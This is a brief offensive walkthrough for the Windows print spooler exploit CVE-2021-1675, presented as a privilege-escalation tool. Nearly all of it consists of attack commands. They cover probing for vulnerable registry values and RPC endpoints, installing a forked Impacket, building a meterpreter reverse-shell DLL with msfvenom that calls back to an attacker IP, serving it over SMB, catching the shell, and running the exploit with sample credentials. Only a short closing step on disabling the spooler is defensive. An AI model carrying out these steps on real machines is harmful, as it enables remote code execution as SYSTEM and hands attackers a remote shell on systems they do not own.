This is a remote code execution vulnerability released on June 1st 2021. The exploit takes advantage of the print spooler running as system and allows remote code execution as System user. The exploit does require valid user credentials which makes this an excellent windows privilege escalation tool to add to your arsenal.
Microsoft has released a patch to mitigate against these attacks but if these values below are present on a machine, then the machine will still be vulnerable
REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint RestrictDriverInstallationToAdministrators REG_DWORD 0x0 NoWarningNoElevationOnInstall REG_DWORD 0x1
Impacket also provides a tool for remote testing. If this tool returns either of the below Protocol results then it could be vulnerable.
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR' Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol Protocol: [MS-RPRN]: Print System Remote Protocol
The exploit requires the latest version of Impacket.
pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install
Before executing the payload against the remote target we need three things:
- Payload to run as System once the exploit has completed. Easiest to just create reverse shell with msfvenom
- SMB share on our machine hosting the payload
- Handler to catch the meterpreter shell (If we used a meterpreter payload)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.240 LPORT=4444 -f dll > shelly.dll
Setup SMB Share
smbserver.py share `pwd` Note: pwd sets our current working directory as the shared directory. "share" is the name of the share and can be anything
Start Multi Handler in msfconsole
use multi handler set payload windows/x64/meterpreter/reverse_tcp
Execute the payload
python3 CVE-2021-1675.py pwnme.local/smarsh:Password1@192.168.1.50 '\\192.168.1.240\share\shelly.dll'
Disable Spooler service
Stop-Service Spooler REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f